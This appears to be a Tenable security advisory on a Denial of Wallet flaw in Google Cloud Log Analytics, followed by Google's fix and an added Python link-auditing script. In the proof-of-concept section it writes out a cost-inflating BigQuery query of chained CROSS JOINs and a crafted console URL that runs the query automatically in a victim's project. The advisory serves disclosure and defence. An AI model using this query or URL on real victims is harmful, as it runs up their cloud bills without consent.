Synopsis
Tenable Research has identified and responsibly disclosed a Denial of Wallet (DoW) vulnerability in Google Cloud Logging's Log Analytics. This vulnerability allowed an attacker to force a victim's project to execute massive, expensive BigQuery queries by visiting a maliciously crafted Cloud Logging URL.
When a user navigates to a Log Analytics URL, the SQL query embedded in the URL is submitted automatically, even when the query is set to run on the BigQuery engine. An attacker could exploit this by crafting a URL that carries a "resource-exhaustion" query. By chaining multiple CROSS JOIN clauses against massive public datasets (e.g., bigquery-public-data), the query can be made to process terabytes of data. Because the BigQuery jobs are started within the victim's project, the query-processing costs are billed directly to the victim's billing account. Simply by navigating to the URL, the victim may incur significant expenses or exhaust their quota.
Proof of Concept
- Create a malicious query that will process a massive amount of data:
SELECT *
FROM
`[VICTIM_PROJECT].global._Default._AllLogs`
CROSS JOIN `bigquery-public-data.[PUBLIC_DATASET].[PUBLIC_TABLE]`
CROSS JOIN `bigquery-public-data.[PUBLIC_DATASET2].[PUBLIC_TABLE2]`
-- Add many more CROSS JOINS to incur more costs
- Craft a Log Analytics URL that will run the query in the victim’s project:
https://console.cloud.google.com/logs/analytics;queriedResources=%7B%22resources%22:%5B%22projects%2F[VICTIM_PROJECT]%2Flocations%2Fglobal%2Fbuckets%2F_Default%2Fviews%2F_AllLogs%22%5D%7D;queryHandle=%7B%22query%22:%22[MALICIOUS_QUERY]%22%7D;upperTab=query;lowerTab=query_results;queryLanguage=SQL;useReservedSlots=true?project=[VICTIM_PROJECT]&chartConfig=%7B%22xyChart%22:%7B%22constantLines%22:%5B%5D,%22dataSets%22:%5B%7B%22breakdowns%22:%5B%5D,%22dimensions%22:%5B%7B%22column%22:%22%22,%22columnType%22:%22%22,%22sortColumn%22:%22%22,%22sortOrder%22:%22SORT_ORDER_ASCENDING%22%7D%5D,%22measures%22:%5B%7B%22aggregationFunction%22:%7B%22parameters%22:%5B%5D,%22type%22:%22count%22%7D,%22column%22:%22%22%7D%5D,%22opsAnalyticsQuery%22:%7B%22queryExecutionRules%22:%7B%22useReservedSlots%22:true%7D,%22queryHandle%22:%22%22,%22sql%22:%22[MALICIOUS_QUERY]%22%7D,%22plotType%22:%22STACKED_BAR%22,%22pointConnectionMethod%22:%22GAP_DETECTION%22,%22sortOrderParameters%22:%5B%5D,%22targetAxis%22:%22Y1%22%7D%5D,%22options%22:%7B%22mode%22:%22COLOR%22%7D,%22y1Axis%22:%7B%22label%22:%22%22,%22scale%22:%22LINEAR%22%7D%7D%7D
- Get the victim to browse to the new malicious URL, which will run the query automatically
Solution
Google has resolved the issue by no longer running Log Analytics queries automatically. For queries that involve resources which do not share an ownership boundary, the console now displays a warning asking the user to check that the query is safe; only after the user confirms can the query be started manually in charts.
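As an added example (not code from the advisory or from Google), the following Python applies the same ownership-boundary test to a Log Analytics deep link before anyone opens it: it decodes the `queryHandle` matrix parameter, reads the billed project from `?project=`, and flags SQL that references tables owned by any other project, counting the CROSS JOINs along the way. The sample link, project name and dataset names are constructed placeholders, and `build_sample_url` only reproduces the parameters the audit reads.

```python
import json
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Backtick-quoted BigQuery paths (`project.dataset.table`, or the 4-part
# `project.location.bucket.view` Log Analytics uses); group 1 is the project.
TABLE_REF = re.compile(r"`([A-Za-z0-9_-]+)(?:\.[A-Za-z0-9_$-]+){2,3}`")
CROSS_JOIN = re.compile(r"\bCROSS\s+JOIN\b", re.IGNORECASE)

# Constructed sample SQL in the shape of the PoC; all names are placeholders.
SAMPLE_SQL = (
    "SELECT *\nFROM `my-victim-project.global._Default._AllLogs`\n"
    "CROSS JOIN `bigquery-public-data.sample_dataset.sample_table`\n"
    "CROSS JOIN `bigquery-public-data.sample_dataset2.sample_table2`"
)

def build_sample_url(project, sql):
    """Constructed link in the shape of the PoC URL, trimmed to the parameters the audit reads."""
    handle = quote(json.dumps({"query": sql}), safe="")
    view = f"projects/{project}/locations/global/buckets/_Default/views/_AllLogs"
    resources = quote(json.dumps({"resources": [view]}), safe="")
    return ("https://console.cloud.google.com/logs/analytics"
            f";queriedResources={resources};queryHandle={handle}"
            ";upperTab=query;lowerTab=query_results;queryLanguage=SQL"
            f";useReservedSlots=true?project={project}")

def parse_log_analytics_url(url):
    """Split the ';'-separated matrix parameters in the path from the ordinary query string."""
    parts = urlsplit(url)
    matrix = {}
    for segment in parts.path.split(";")[1:]:
        key, _, value = segment.partition("=")
        matrix[key] = unquote(value)
    return matrix, parse_qs(parts.query)

def audit_url(url):
    """Flag a link whose SQL touches projects other than the one that is billed,
    the ownership-boundary condition the vendor's fix now warns about."""
    matrix, query = parse_log_analytics_url(url)
    billed_project = query["project"][0]
    sql = json.loads(matrix["queryHandle"])["query"]  # queryHandle = {"query": "<sql>"}
    foreign = sorted({p for p in TABLE_REF.findall(sql) if p != billed_project})
    return {
        "project": billed_project,
        "cross_joins": len(CROSS_JOIN.findall(sql)),
        "foreign_projects": foreign,
        "crosses_ownership_boundary": bool(foreign),
    }
```

Running `audit_url(build_sample_url("my-victim-project", SAMPLE_SQL))` reports two CROSS JOINs and `bigquery-public-data` as a foreign project, so the link would be held for confirmation rather than run.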
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]